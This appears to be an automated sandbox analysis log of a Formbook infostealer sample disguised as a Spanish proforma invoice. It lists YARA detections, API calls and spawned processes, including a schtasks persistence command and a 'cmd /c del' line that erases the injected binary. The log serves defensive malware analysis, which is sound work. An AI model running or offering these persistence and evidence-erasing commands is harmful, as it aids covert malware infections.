            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296F2980_2_0296F298
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296F2880_2_0296F288
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_0296D0640_2_0296D064
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041F04E6_2_0041F04E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E8726_2_0041E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010306_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D97A6_2_0041D97A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EBDA6_2_0041EBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E3A36_2_0041E3A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E4376_2_0041E437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D906_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E606_2_00409E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E1A6_2_00409E1A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D72A6_2_0041D72A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041EF376_2_0041EF37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB06_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016041206_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EF9006_2_015EF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A10026_2_016A1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A06_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B20A86_2_016B20A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB0906_2_015FB090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2B286_2_016B2B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161EBB06_2_0161EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B22AE6_2_016B22AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1D556_2_016B1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2D076_2_016B2D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E0D206_2_015E0D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E06_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016125816_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F841F6_2_015F841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1FF16_2_016B1FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01606E306_2_01606E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B2EF76_2_016B2EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F841F10_2_047F841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048A100210_2_048A1002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FB09010_2_047FB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E0D2010_2_047E0D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EF90010_2_047EF900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FD5E010_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0480412010_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048B1D5510_2_048B1D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04806E3010_2_04806E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0481EBB010_2_0481EBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AE87210_2_029AE872
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02999E1A10_2_02999E1A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02999E6010_2_02999E60
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02992FB010_2_02992FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD72A10_2_029AD72A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02992D9010_2_02992D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 015EB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 047EB150 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A35A NtCreateFile,6_2_0041A35A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A53A NtAllocateVirtualMemory,6_2_0041A53A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01629910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299A0 NtCreateSection,LdrInitializeThunk,6_2_016299A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01629860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629840 NtDelayExecution,LdrInitializeThunk,6_2_01629840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016298F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A50 NtCreateFile,LdrInitializeThunk,6_2_01629A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A20 NtResumeThread,LdrInitializeThunk,6_2_01629A20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01629A00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629540 NtReadFile,LdrInitializeThunk,6_2_01629540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295D0 NtClose,LdrInitializeThunk,6_2_016295D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629710 NtQueryInformationToken,LdrInitializeThunk,6_2_01629710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016297A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016297A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629780 NtMapViewOfSection,LdrInitializeThunk,6_2_01629780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01629660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016296E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629950 NtQueueApcThread,6_2_01629950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016299D0 NtCreateProcessEx,6_2_016299D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162B040 NtSuspendThread,6_2_0162B040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629820 NtEnumerateKey,6_2_01629820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016298A0 NtWriteVirtualMemory,6_2_016298A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629B00 NtSetValueKey,6_2_01629B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A3B0 NtGetContextThread,6_2_0162A3B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A10 NtQuerySection,6_2_01629A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629A80 NtOpenDirectoryObject,6_2_01629A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629560 NtWriteFile,6_2_01629560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629520 NtWaitForSingleObject,6_2_01629520
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162AD30 NtSetContextThread,6_2_0162AD30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016295F0 NtQueryInformationFile,6_2_016295F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629760 NtOpenProcess,6_2_01629760
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629770 NtSetInformationFile,6_2_01629770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A770 NtOpenThread,6_2_0162A770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629730 NtQueryVirtualMemory,6_2_01629730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162A710 NtOpenProcessToken,6_2_0162A710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629FE0 NtCreateMutant,6_2_01629FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629670 NtQueryInformationProcess,6_2_01629670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629650 NtQueryValueKey,6_2_01629650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01629610 NtEnumerateValueKey,6_2_01629610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016296D0 NtCreateKey,6_2_016296D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829840 NtDelayExecution,LdrInitializeThunk,10_2_04829840
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04829860
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299A0 NtCreateSection,LdrInitializeThunk,10_2_048299A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295D0 NtClose,LdrInitializeThunk,10_2_048295D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04829910
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829540 NtReadFile,LdrInitializeThunk,10_2_04829540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296D0 NtCreateKey,LdrInitializeThunk,10_2_048296D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_048296E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829650 NtQueryValueKey,LdrInitializeThunk,10_2_04829650
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A50 NtCreateFile,LdrInitializeThunk,10_2_04829A50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04829660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829780 NtMapViewOfSection,LdrInitializeThunk,10_2_04829780
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829FE0 NtCreateMutant,LdrInitializeThunk,10_2_04829FE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829710 NtQueryInformationToken,LdrInitializeThunk,10_2_04829710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298A0 NtWriteVirtualMemory,10_2_048298A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048298F0 NtReadVirtualMemory,10_2_048298F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829820 NtEnumerateKey,10_2_04829820
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482B040 NtSuspendThread,10_2_0482B040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048299D0 NtCreateProcessEx,10_2_048299D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048295F0 NtQueryInformationFile,10_2_048295F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829520 NtWaitForSingleObject,10_2_04829520
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482AD30 NtSetContextThread,10_2_0482AD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829950 NtQueueApcThread,10_2_04829950
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829560 NtWriteFile,10_2_04829560
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A80 NtOpenDirectoryObject,10_2_04829A80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A00 NtProtectVirtualMemory,10_2_04829A00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829610 NtEnumerateValueKey,10_2_04829610
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A10 NtQuerySection,10_2_04829A10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829A20 NtResumeThread,10_2_04829A20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829670 NtQueryInformationProcess,10_2_04829670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048297A0 NtUnmapViewOfSection,10_2_048297A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A3B0 NtGetContextThread,10_2_0482A3B0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829B00 NtSetValueKey,10_2_04829B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A710 NtOpenProcessToken,10_2_0482A710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829730 NtQueryVirtualMemory,10_2_04829730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829760 NtOpenProcess,10_2_04829760
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04829770 NtSetInformationFile,10_2_04829770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0482A770 NtOpenThread,10_2_0482A770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA360 NtCreateFile,10_2_029AA360
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA490 NtClose,10_2_029AA490
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA410 NtReadFile,10_2_029AA410
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA540 NtAllocateVirtualMemory,10_2_029AA540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA35A NtCreateFile,10_2_029AA35A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AA53A NtAllocateVirtualMemory,10_2_029AA53A
            Source: Factura de proforma.exeBinary or memory string: OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.327421631.0000000007900000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000000.296727350.00000000007A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: i,\\StringFileInfo\\000004B0\\OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exeBinary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Factura de proforma.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tskpCbAwtxoaw.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile read: C:\Users\user\Desktop\Factura de proforma.exeJump to behavior
            Source: Factura de proforma.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Factura de proforma.exe 'C:\Users\user\Desktop\Factura de proforma.exe'
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
